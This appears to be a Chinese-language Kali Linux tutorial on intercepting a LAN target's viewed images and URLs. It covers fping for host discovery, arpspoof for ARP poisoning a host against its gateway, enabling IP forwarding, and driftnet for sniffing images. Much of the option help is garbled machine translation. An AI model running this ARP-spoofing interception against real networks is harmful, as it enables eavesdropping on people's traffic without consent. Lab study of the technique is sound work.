kali之獲取靶機的圖片和看的url
需要用到 fping工具 用-asg參數
調查選項:
-4,ipv4只能ping ipv4地址
-6——ipv6只在ping ipv6地址
-b——大小=字節數量的ping數據以字節的方式發送(默認為:56)
-B——backoff=N設置指數backoff因子到N(默認值:1。5)
——count=N計數模式:向每個目標發送N個ping信號
-f文件=文件讀取目標文件的文件列表(-表示stdin)
-g——生成生成目標列表(只有在沒有-f指定的情況下)
(在目標列表中給出開始和結束IP,或者是CIDR地址)
(例如,fping-g 192.168.1.0 192.168.1.255或fping-g 192.168.1.0/24)
-H,ttl=N設置了IP ttl值(用於實時跳轉的時間)
——iface=iface綁定到一個特定的接口
-l——循環循環模式:永遠發送ping信號
-m,全部使用提供主機名的ip(如IPv4和IPv6),使用-A
-dontfrag設置了不分段標記
-O-tos=N在ICMP包中設置了服務的類型(tos)標誌
-p,-周期=MSEC間隔到一個目標(在ms)
(在循環和計數模式中,默認值:1000毫秒)
-r,重試=N的重試次數(默認值:3)
-R——隨機隨機分組數據(用來挫敗鏈接數據壓縮)
-S-src=IP集源地址
-t,-超時=MSEC單獨的目標初始超時(默認為500毫秒,
除了-l/-c/-c,它是
輸出選項:
-a,活著的目標是活著的
-A-addr通過地址顯示目標
-C,vcount=N和-C,以詳細格式報告結果
——在每個輸出行之前,時間戳打印時間戳
-e——在返回的包中運行的時間
-i-間隔=MSEC間隔發送ping包(默認值:10毫秒)
-n,名稱以名稱顯示目標(-d是等價的)
-N-netdata輸出可兼容netdata(-l-Q是必需的)
-o-停機顯示了累計的宕機時間(丟失的包包間隔)
-q-安靜的安靜(不要顯示每一個目標/每平的結果)
-Q-s=SECS與-Q相同,但每n秒顯示一次
-s,統計打印最終數據
-u-無法到達的目標是無法到達的
- v,版本顯示的版本
查看你掃描到的ip
開啟arp欺騙用 arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
選項
- i 指定要使用的接口。
- c的主機| |
在恢復arp映射時指定使用哪個硬件地址
成形;在清理時,可以用自己的包發送數據包
地址和主機地址。發送的數據包
一個虛假的hw地址會破壞與某些特定的連接
轉換/ap/橋配置,但是它更可靠
而不是使用自己的地址,這是arps的默認方式
事後清理。
- t目標
指定一個特定的主機到ARP毒藥(如果沒有指定的話
局域網主機)。重復指定多個主機。
-r毒害兩個主機(主機和目標)以捕獲兩者的通信量
的方向。(只在與-t的聯合中有效)
主機指定要截獲數據包的主機(通常是
本地網關)。
反饋成功後靶機斷網(arp攻擊)
關掉進程
開啟本地的ip轉發
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
在進行(arp欺騙) arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
目標可以上網
使用root@kali:~# driftnet -i eth0 工具查看靶機瀏覽的圖片信息
選項:
-h顯示這個幫助信息。
- v詳細操作。
- b當一個新圖像被捕獲時,b蜂鳴。
-i接口選擇要監聽的接口(默認:所有
接口)。
-f文件而不是監聽接口,讀取捕獲
來自pcap轉儲文件的數據包;文件可以是命名管道
用於與Kismet或相似的用途。
-p不把監聽接口設置為混亂模式。
輔助模式:不要在屏幕上顯示圖像,而是保存
將它們放到一個臨時目錄中,並在上面公布它們的名稱
標準輸出。
在臨時目錄中保存的圖像的最大數量
在兼職模式。
-d目錄使用指定的臨時目錄。
-x前綴在保存圖像時使用。
-s嘗試從網絡中提取音頻數據,
除了圖像。目前,這支持MPEG數據
只有。
-S提取音頻流,而不是圖像。
-M命令使用給定的命令來播放MPEG音頻數據
s選項;這應該處理MPEG幀
提供的標準輸入。默認值:“mpg123——”。
主要參數:
-b 捕獲到新的圖片時發出嘟嘟聲
-i interface 選擇監聽接口
-f file 讀取一個指定pcap數據包中的圖片
-p 不讓所監聽的接口使用混雜模式
-a 後臺模式:將捕獲的圖片保存到目錄中(不會顯示在屏幕上)
-m number 指定保存圖片數的數目
-d directory 指定保存圖片的路徑
-x prefix 指定保存圖片的前綴名
使用舉例:
1.實時監聽: driftnet -i wlan0
2.讀取一個指定pcap數據包中的圖片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
kali之獲取靶機的圖片和看的url